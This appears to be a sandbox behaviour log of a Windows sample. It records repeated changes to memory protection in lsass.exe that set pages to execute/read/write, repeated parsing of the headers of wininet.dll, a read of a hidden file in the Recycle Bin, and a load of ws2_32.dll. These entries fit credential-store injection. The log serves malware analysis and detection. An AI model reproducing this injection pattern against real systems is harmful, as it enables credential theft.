System info queried Type: BasicInformation success or wait 2031368974
System info queried Type: ProcessorInformation success or wait 2031369278
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 7E418BF6 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031370482
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: BAFC210 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031370796
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 3D949088 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2031370998
System info queried Type: BasicInformation success or wait 2031371378
System info queried Type: ProcessorInformation success or wait 2031371672
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031372092
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031372945
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2031373213
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031373916
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2031374181
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2031374498
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031375108
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2031375372
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031375908
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2031376253
System info queried Type: BasicInformation success or wait 2031377076
System info queried Type: ProcessorInformation success or wait 2031377378
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 3D949088 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031378974
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: BB10D98 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031379275
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 3D95EE89 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2031379665
System info queried Type: BasicInformation success or wait 2031379958
System info queried Type: ProcessorInformation success or wait 2031380253
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031380668
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031381517
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2031381791
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031382228
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2031382497
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2031382811
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031383422
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2031383688
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031384224
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2031384567
System info queried Type: BasicInformation success or wait 2031385387
System info queried Type: ProcessorInformation success or wait 2031385688
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 3D95EE89 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031387364
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: BB104E8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031387667
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 3D94FABE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2031388057
System info queried Type: BasicInformation success or wait 2031388350
System info queried Type: ProcessorInformation success or wait 2031388643
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031389057
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031389907
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2031390174
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031390572
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2031390838
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2031391152
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031391762
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2031394007
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031394629
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2031394977
System info queried Type: BasicInformation success or wait 2031395802
System info queried Type: ProcessorInformation success or wait 2031396102
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 3D94FABE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031397886
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: BAF65C8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031398190
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 3D9A608E Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2031398831
System info queried Type: BasicInformation success or wait 2031399125
System info queried Type: ProcessorInformation success or wait 2031399418
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031399834
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031400682
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2031400950
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031401347
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2031401611
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2031401924
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031402534
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2031402800
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031403333
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2031403675
System info queried Type: BasicInformation success or wait 2031404490
System info queried Type: ProcessorInformation success or wait 2031404789
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 3D9A608E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031406441
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: BAFF660 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031406743
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2031407633
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2031408995
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 3D94D508 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2031420853
System info queried Type: BasicInformation success or wait 2031421152
System info queried Type: ProcessorInformation success or wait 2031421456
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031421873
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031422722
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2031422992
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031423387
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2031423651
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2031423964
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031424570
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2031424834
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031425365
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2031425704
System info queried Type: BasicInformation success or wait 2031426523
System info queried Type: ProcessorInformation success or wait 2031426822
System info queried Type: BasicInformation success or wait 2031429460
System info queried Type: ProcessorInformation success or wait 2031429752
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031430166
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031431008
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2031431277
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031431669
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2031431935
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2031432248
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031432962
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2031433232
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031433767
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2031434107
System info queried Type: BasicInformation success or wait 2031434960
System info queried Type: ProcessorInformation success or wait 2031435260
System info queried Type: BasicInformation success or wait 2031437990
System info queried Type: ProcessorInformation success or wait 2031438285
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031438702
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031439550
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2031439817
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031440215
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2031440478
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2031440794
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031441405
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2031441667
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031442201
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2031442545
System info queried Type: BasicInformation success or wait 2031443364
System info queried Type: ProcessorInformation success or wait 2031443663
System info queried Type: BasicInformation success or wait 2031446307
System info queried Type: ProcessorInformation success or wait 2031446601
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031447014
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031447717
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2031451308
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031451721
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2031451988
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2031452304
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031452917
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2031453207
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031453834
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2031454180
System info queried Type: BasicInformation success or wait 2031455021
System info queried Type: ProcessorInformation success or wait 2031455322
System info queried Type: BasicInformation success or wait 2031457981
System info queried Type: ProcessorInformation success or wait 2031458275
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031458693
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031459556
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2031459823
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031460220
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2031460485
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2031460797
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031461407
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2031461673
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031462207
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2031462550
System info queried Type: BasicInformation success or wait 2031463369
System info queried Type: ProcessorInformation success or wait 2031463670
System info queried Type: BasicInformation success or wait 2031466314
System info queried Type: ProcessorInformation success or wait 2031466607
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031467020
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031467866
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2031468137
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031468533
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2031468900
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2031469219
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031469830
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2031470016
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031470554
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2031470897
System info queried Type: BasicInformation success or wait 2031471793
System info queried Type: ProcessorInformation success or wait 2031472094
System info queried Type: BasicInformation success or wait 2031474752
System info queried Type: ProcessorInformation success or wait 2031475046
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031475463
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031476313
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2031476581
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031476979
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2031477243
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2031477558
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031478170
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2031478434
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031478968
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2031479313
System info queried Type: BasicInformation success or wait 2031480135
System info queried Type: ProcessorInformation success or wait 2031480436
System info queried Type: BasicInformation success or wait 2031483123
System info queried Type: ProcessorInformation success or wait 2031483417
File opened Path: C:\WINDOWS\system32\WS2_32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031483827
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ws2_32.dll success or wait 2031484676
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2031484945
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ws2_32.dll success or wait 2031485653
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 20 Value: 4C 01 04 00 63 A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2031485921
